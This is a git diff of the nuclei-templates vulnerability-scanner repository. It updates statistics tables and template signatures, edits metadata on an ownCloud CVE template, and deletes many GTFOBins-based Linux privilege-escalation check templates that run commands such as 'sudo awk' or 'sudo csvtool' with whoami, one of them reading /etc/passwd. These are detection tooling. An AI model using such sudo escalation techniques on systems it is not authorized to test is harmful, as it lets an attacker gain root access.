| wp-plugin | 304 | pussycat0x | 130 | default-logins | 102 | | | | |
|
|
||||||
| tech | 286 | gy741 | 126 | file | 76 | | | | |
|
|
||||||
|
|
||||||
**286개 디렉토리, 4012개 파일**.
|
|
||||||
|
|
||||||
</td>
|
|
||||||
</tr>
|
|
||||||
</table>
|
|
||||||
|
|
||||||
📖 문서
|
|
||||||
-----
|
|
||||||
|
|
||||||
새 템플릿이나 사용자 정의 템플릿을 빌드하기 위한 자세한 문서는 https://nuclei.projectdiscovery.io 에서 확인할 수 있습니다. 작업 방식의 이해를 돕기 위한 템플릿들도 있습니다.
|
|
||||||
|
|
||||||
💪 기여
|
|
||||||
-----
|
|
||||||
|
|
||||||
Nuclei 템플릿은 커뮤니티의 기여로 동작합니다.
|
|
||||||
[템플릿 기여](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=submit-template.md&title=%5Bnuclei-template%5D+), [기능 요청](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=feature_request.md&title=%5BFeature%5D+), [버그 제보](https://github.com/projectdiscovery/nuclei-templates/issues/new?assignees=&labels=&template=bug_report.md&title=%5BBug%5D+)는 언제든지 환영합니다.
|
|
||||||
|
|
||||||
![Alt](https://repobeats.axiom.co/api/embed/55ee65543bb9a0f9c797626c4e66d472a517d17c.svg "Repobeats analytics image")
|
|
||||||
|
|
||||||
💬 논의
|
|
||||||
-----
|
|
||||||
|
|
||||||
같이 이야기하고 싶은 질문, 의문 혹은 아이디어가 있으신가요?
|
|
||||||
[Github discussions](https://github.com/projectdiscovery/nuclei-templates/discussions) 에서 자유롭게 시작할 수 있습니다.
|
|
||||||
|
|
||||||
👨💻 커뮤니티
|
|
||||||
-----
|
|
||||||
|
|
||||||
프로젝트 관리자와 직접 논의하고 보안과 자동화 관련 사항을 다른 사람과 공유하기 위해 [Discord Community](https://discord.gg/projectdiscovery) 에 참여하는 것을 환영합니다. 추가로 Nuclei 에 대한 모든 정보를 업데이트 하기 위해 [트위터](https://twitter.com/pdnuclei) 팔로우를 할 수 있습니다.
|
|
||||||
|
|
||||||
<p align="center">
|
|
||||||
<a href="https://github.com/projectdiscovery/nuclei-templates/graphs/contributors">
|
|
||||||
<img src="https://contrib.rocks/image?repo=projectdiscovery/nuclei-templates&max=300">
|
|
||||||
</a>
|
|
||||||
</p>
|
|
||||||
|
|
||||||
여러분의 기여와 커뮤니티의 활성화를 위한 노력에 다시한번 감사드립니다.
|
|
||||||
:heart:
|
|
File diff suppressed because one or more lines are too long
4909
TEMPLATES-STATS 2.md
4909
TEMPLATES-STATS 2.md
File diff suppressed because it is too large
File diff suppressed because one or more lines are too long
9741
TEMPLATES-STATS.md
9741
TEMPLATES-STATS.md
File diff suppressed because it is too large
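--- a/TOP-10 2.md
+++ b/TOP-10 2.md
@@ -1,12 +0,0 @@
-| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
-|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
-| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
-| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
-| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
-| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
-| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
-| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
-| osint | 677 | pdteam | 286 | dns | 17 | | | | |
-| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
-| lfi | 619 | geeknik | 224 | code | 3 | | | | |
-| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |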
20
TOP-10.md
20
TOP-10.md
|
@ -1,12 +1,12 @@
|
||||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||||
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
|-----------|-------|--------------|-------|------------|-------|----------|-------|------|-------|
|
||||||
| cve | 2318 | dhiyaneshdk | 1135 | http | 6947 | info | 3351 | file | 312 |
|
| cve | 2296 | dhiyaneshdk | 1123 | http | 6913 | info | 3337 | file | 312 |
|
||||||
| panel | 1040 | dwisiswant0 | 801 | file | 312 | high | 1471 | dns | 20 |
|
| panel | 1038 | dwisiswant0 | 801 | file | 312 | high | 1458 | dns | 18 |
|
||||||
| wordpress | 941 | daffainfo | 789 | workflows | 191 | medium | 1445 | | |
|
| wordpress | 938 | daffainfo | 788 | workflows | 191 | medium | 1439 | | |
|
||||||
| xss | 851 | pikpikcu | 353 | network | 132 | critical | 933 | | |
|
| xss | 848 | pikpikcu | 353 | network | 131 | critical | 919 | | |
|
||||||
| exposure | 850 | pussycat0x | 313 | ssl | 27 | low | 251 | | |
|
| exposure | 844 | pussycat0x | 307 | ssl | 27 | low | 248 | | |
|
||||||
| wp-plugin | 815 | ritikchaddha | 298 | javascript | 25 | unknown | 34 | | |
|
| wp-plugin | 812 | ritikchaddha | 298 | javascript | 21 | unknown | 34 | | |
|
||||||
| osint | 678 | pdteam | 286 | dns | 17 | | | | |
|
| osint | 677 | pdteam | 286 | dns | 17 | | | | |
|
||||||
| tech | 650 | ricardomaia | 229 | headless | 11 | | | | |
|
| tech | 649 | ricardomaia | 229 | headless | 11 | | | | |
|
||||||
| lfi | 622 | geeknik | 225 | cloud | 9 | | | | |
|
| lfi | 619 | geeknik | 224 | code | 3 | | | | |
|
||||||
| edb | 598 | theamanrawat | 221 | code | 5 | | | | |
|
| edb | 598 | theamanrawat | 221 | cves.json | 1 | | | | |
|
||||||
|
|
|
@ -8,8 +8,7 @@ info:
|
||||||
Searches for Azure virtual machines via their registered DNS names.
|
Searches for Azure virtual machines via their registered DNS names.
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
tags: cloud,enum,cloud-enum,azure,fuzz
|
tags: cloud,enum,cloud-enum,azure
|
||||||
|
|
||||||
|
|
||||||
self-contained: true
|
self-contained: true
|
||||||
|
|
||||||
|
@ -63,4 +62,4 @@ dns:
|
||||||
part: answer
|
part: answer
|
||||||
words:
|
words:
|
||||||
- "IN\tA"
|
- "IN\tA"
|
||||||
# digest: 4b0a00483046022100f91b6621181f8a7317c1ffc179ec2b81e33c8dd0dd28cc4871b13ffbb794ce84022100e7424a97fab1f6b745d735e7dad8f13b08ad36732b24216ae2826611af634318:922c64590222798bb761d5b6d8e72950
|
# digest: 4b0a004830460221008d223bfdb3585e335e8282ca206945a6f7704dab4a2899d3410229bf0db7132d022100b9de9af2b393a559575b67a5b25b6334fe8cddd1ceed5059ee634dc3b0292d50:922c64590222798bb761d5b6d8e72950
|
|
@ -33,4 +33,4 @@ http:
|
||||||
- 200
|
- 200
|
||||||
- 302
|
- 302
|
||||||
condition: or
|
condition: or
|
||||||
# digest: 4a0a0047304502204e87fb6ea9b294616dce1e74e429d8a83672921a242d1b3421a0c553eba83894022100bf53c3468808e2316f9194022db3618093873de428109de1984d0664f6bc89ee:922c64590222798bb761d5b6d8e72950
|
# digest: 490a00463044022001ff1a4cff9e33f3817df1e824a00e35f76c6f8e22cd34e3616e452978dc46f702200913c7710eba2b3df98325a1bb7da86b55cde6d4a3d7199a7d952f1f7988a3fa:922c64590222798bb761d5b6d8e72950
|
|
@ -39,4 +39,4 @@ http:
|
||||||
- "status_code==302"
|
- "status_code==302"
|
||||||
- contains(location, "login")
|
- contains(location, "login")
|
||||||
condition: and
|
condition: and
|
||||||
# digest: 490a00463044022017250b6b9f7ccf30e614e7bfb992e2e9ec13fd27556137cf4b13dc2f2a8c70b602200e352bbaebbd9dfbced84b3f9dff65c9d1b3dac47a0eec812b738a987931a14c:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402204edc5a3fc90ff80b8397219e37a716d5b582c9821dbb0edda2c52c585aa241ca022067b0c7178f7f345975f765bdd56afc967505028e459ed113c8fbd450a1dcb76a:922c64590222798bb761d5b6d8e72950
|
|
@ -36,4 +36,4 @@ http:
|
||||||
name: "Protected GCP Bucket"
|
name: "Protected GCP Bucket"
|
||||||
status:
|
status:
|
||||||
- 403
|
- 403
|
||||||
# digest: 4b0a00483046022100baff7bb9e12a115a59a755c8188c3544cc8497dc3a17860023486de9f4992def02210096b193c8507208f3d30cd9fc716d4be46cd9acb83418f2fa62f0d10ce305d026:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220549241cfe0dbdadf24bcbdabd6cbf8e82a45bea577710e8409da53f3bdef37d202203bab8b09dea7b68aafc32f8214b331ee6dc4dbe85c0e7a34693b8062dec6fb6a:922c64590222798bb761d5b6d8e72950
|
|
@ -31,4 +31,4 @@ http:
|
||||||
name: "Open GCP Firebase App"
|
name: "Open GCP Firebase App"
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
# digest: 4a0a00473045022065f44c35d042a0e98f90303a7f4181c0644c2e2fb8c7344c42d13104f89a454a022100cf17441e1fdb9ae05d7bdfca68f98abf3a4794b4d24e8ec69083e6323e96c39f:922c64590222798bb761d5b6d8e72950
|
# digest: 490a004630440220721a516d58d71b3c20990c97c22986fd212caafa366f2641bdb4fe9df0a53f9802205ecd4bfcda0808d5002e9d1194e0ec0f4d2b2f2140170c0df4ffb11372a6470f:922c64590222798bb761d5b6d8e72950
|
|
@ -47,4 +47,4 @@ http:
|
||||||
name: "Deactivated GCP Firebase RTDB"
|
name: "Deactivated GCP Firebase RTDB"
|
||||||
status:
|
status:
|
||||||
- 423
|
- 423
|
||||||
# digest: 490a0046304402207b555ae31d639c4a2fa71c2988103f8eb74cd24ca8b3304e33059facb0c9275f02203b74c0ab6645d3c30970046284fffbea86b75f0bcf40192f6021b2297b616b7d:922c64590222798bb761d5b6d8e72950
|
# digest: 490a0046304402200dcb47ae02c77c619eea0d95a6ab7dc9f2be071cea09abee3a7ab748b11e561c022034956ced05346f9cfcc9d425d92fa1242c979572e8ae02030496597f64ccfe82:922c64590222798bb761d5b6d8e72950
|
|
@ -15,11 +15,13 @@ info:
|
||||||
cvss-score: 9.8
|
cvss-score: 9.8
|
||||||
cve-id: CVE-2023-49105
|
cve-id: CVE-2023-49105
|
||||||
cwe-id: CWE-287
|
cwe-id: CWE-287
|
||||||
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
|
|
||||||
epss-score: 0.00091
|
epss-score: 0.00091
|
||||||
epss-percentile: 0.38353
|
epss-percentile: 0.38353
|
||||||
|
cpe: cpe:2.3:a:owncloud:owncloud:*:*:*:*:*:*:*:*
|
||||||
metadata:
|
metadata:
|
||||||
max-request: 2
|
verified: true
|
||||||
|
max-request: 1
|
||||||
|
vendor: owncloud
|
||||||
product: owncloud
|
product: owncloud
|
||||||
shodan-query: title:"owncloud"
|
shodan-query: title:"owncloud"
|
||||||
tags: cve,cve2023,code,owncloud,auth-bypass
|
tags: cve,cve2023,code,owncloud,auth-bypass
|
||||||
|
@ -84,4 +86,4 @@ http:
|
||||||
- type: dsl
|
- type: dsl
|
||||||
dsl:
|
dsl:
|
||||||
- '"Username => "+ username'
|
- '"Username => "+ username'
|
||||||
# digest: 4a0a00473045022100f1395fdef2764cce1bd751a6a94c3f89afc0fb10d9437288388d31d6460a983002203d431b3492fa8d2501b3387ae3cf0f975385c21f7ac74d2deafcf878645c6f45:922c64590222798bb761d5b6d8e72950
|
# digest: 4a0a00473045022100f17bb3bb403b74c4e84e6190df79bf767df834017742b4b95607de42a3d948bb02205f2f1de3f09d31920d6bf102ba93c1ad271809327b5997d8d58e9f97f2886c11:922c64590222798bb761d5b6d8e72950
|
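Review bot: `max-request` under `metadata` drops from 2 to 1 in the CVE-2023-49105 template, yet no hunk in this file section touches a request; the only other change is the re-signed `# digest:` line at the end. The number of requests the template sends is therefore unchanged by this commit, so one of the two values misstates it. The request definitions lie outside the visible hunks, so the count should be checked against the template body and `max-request: 2` kept if both steps still run. The same hunk adds `verified: true`, which is only accurate if this exact revision was validated against a known-affected ownCloud instance; otherwise leave it out until that is done.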
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-aa-exec
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: aa-exec - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
aa-exec is used to launch a program confined by the specified profile and or namespace.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/aa-exec/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,aa-exec,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
aa-exec whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo aa-exec whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a00463044022052655e82a2302e3930061a3e1ca4ea0c65ab553c1a688654c29f9f50eecb29690220468307131c8570d5c7c58b629e5cb7c069c1078dea98d211b619b0a9de1f6f69:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-ash
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Ash - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Ash allows the value of a variable to be set at the same time it is marked read only by writing readonly name=value With no arguments
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/ash/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,ash,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
ash -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo ash -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100d25c9dd1ce2eab3a962a4071a9f7500f59466848425225cd4047cc3115acbe37022061461b964e2bc7a9985a89d47c03136a8cb815900a1ba2038fbb8d073b88737b:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-awk
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: awk - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
AWK is a domain-specific language designed for text processing and typically used as a data extraction and reporting tool. Like sed and grep, it is a filter, and is a standard feature of most Unix-like operating systems.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/awk/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,awk,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
awk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo awk 'BEGIN {system("whoami")}'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502207cfdd41f99f02f347c5b0128ff351ced0e1c8e89e428d60a150c3c0c4f4074a70221008929ee587f0b3ab78860124591c0b22afad37bb9de4f3220dadc7a4fe8865717:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-bash
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Bash - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
Bash is a Unix shell and command language written by Brian Fox for the GNU Project as a free software replacement for the Bourne shell. The shell's name is an acronym for Bourne Again Shell, a pun on the name of the Bourne shell that it replaces and the notion of being born again.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/bash/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,bash,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
bash -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo bash -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100b7f18627e0f3bbce9603130789596a844773fb76cdf73efdd2aa6073f8dad7eb02200510ef23d0f787a00e1701e1ad09999cf61f7bfcd43981de1be530439984302d:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-cdist
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Cdist - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
cdist is a free software configuration management tool for Unix-like systems. It manages nodes over SSH using the Bourne Shell, and does not require any additional software to be installed on target nodes.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/cdist/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,cdist,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
cdist shell -s whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo cdist shell -s whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4b0a00483046022100afe727ba45ca0c542cf2d85169a2be57d6e94550933ab38dcea2dc7a3bd9eb32022100e6d9677f8dc6af52f782bf0411ad39256b42baeae17ad41d2cb78f617de9a96c:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-choom
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: choom - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
choom is a command-line utility in Linux that allows users to change the memory limits of a process. It can be used for privilege escalation by manipulating the memory limits of a process to gain elevated privileges.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/choom/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,choom,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
choom -n 0 whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo choom -n 0 whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a00473045022100fc1a34cafa1e9c85f010f1aa08836c998e0f4e513055f17bfb43da6db708baa202200ec15a67896e438ec1b28022758c36b7989839fa08ede457ff86aa9c0d8c03f8:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-cpulimit
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: CPUlimit - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
cpulimit is a command-line utility in Linux that allows users to limit the CPU usage of a process. It can be used to control and limit the CPU usage of a specific process, which can be helpful in various scenarios such as preventing a process from consuming excessive CPU resources.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/cpulimit/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,cpulimit,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
cpulimit -l 100 -f whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo cpulimit -l 100 -f whoami
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a0046304402207e255b9140d3cd0efd52da82f2f4afeb244db042c2f993abb08f8859759f18030220164d73b076aabb9806d19260cc6b408cc718d4417c1cae85d5e6cc7928cb3348:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-csh
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: csh - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
csh stands for C Shell, which is a Unix shell with C-like syntax. It is a command-line interpreter that provides a command-line interface for Unix-like operating systems. It has features similar to other Unix shells such as bash and sh, but with a different syntax and set of features.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/csh/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,csh,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
csh -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo csh -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 490a00463044022073087d98db072057b1d437680410e93f4001fafa2b317ee2b2222b096888298402205cf5ea8bf97355a4045d3ad9e358df8cdf008972984d331749da3b24cdd81112:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-csvtool
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: csvtool - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
csvtool is a command-line utility in Unix-like operating systems that provides various tools for working with CSV (Comma-Separated Values) files. It can be used to manipulate, process, and analyze CSV data from the command line, making it a useful tool for tasks such as data extraction, transformation, and loading.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/csvtool/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,csvtool,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
csvtool call 'whoami;false' /etc/passwd
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo csvtool call 'whoami;false' /etc/passwd
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a004730450221008f61aeee9c793f162145ff039cb690183408260ff73c1fa21d70cb446f268e0c022019369ba062fbcd462b62d4f372eb206a9f971cc2c9e892cbeaf8db6657748214:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-dash
|
|
||||||
|
|
||||||
info:
|
|
||||||
name: Dash - Privilege Escalation
|
|
||||||
author: daffainfo
|
|
||||||
severity: high
|
|
||||||
description: |
|
|
||||||
dash is a POSIX-compliant shell that is commonly used as the default system shell on Debian-based systems. It is designed to be a lightweight and fast shell, suitable for scripting and system administration tasks. It aims to be compatible with the POSIX standard for shells, providing a minimalistic and efficient environment for running shell scripts.
|
|
||||||
reference:
|
|
||||||
- https://gtfobins.github.io/gtfobins/dash/
|
|
||||||
metadata:
|
|
||||||
verified: true
|
|
||||||
tags: code,linux,dash,privesc
|
|
||||||
|
|
||||||
self-contained: true
|
|
||||||
code:
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
whoami
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
dash -c 'whoami'
|
|
||||||
|
|
||||||
- engine:
|
|
||||||
- sh
|
|
||||||
- bash
|
|
||||||
source: |
|
|
||||||
sudo dash -c 'whoami'
|
|
||||||
|
|
||||||
matchers-condition: and
|
|
||||||
matchers:
|
|
||||||
- type: word
|
|
||||||
part: code_1_response
|
|
||||||
words:
|
|
||||||
- "root"
|
|
||||||
negative: true
|
|
||||||
|
|
||||||
- type: dsl
|
|
||||||
dsl:
|
|
||||||
- 'contains(code_2_response, "root")'
|
|
||||||
- 'contains(code_3_response, "root")'
|
|
||||||
condition: or
|
|
||||||
# digest: 4a0a0047304502206693d6df56591ca0de940a5ff0c655c2e36744fd82fb12906d55eaab0705cb5802210099aa3cc19e3d2124e7e010ba08e62fd0fb803c2cbdaa933835208f2c46a4168e:922c64590222798bb761d5b6d8e72950
|
|
|
@ -1,48 +0,0 @@
|
||||||
id: privesc-dc
|
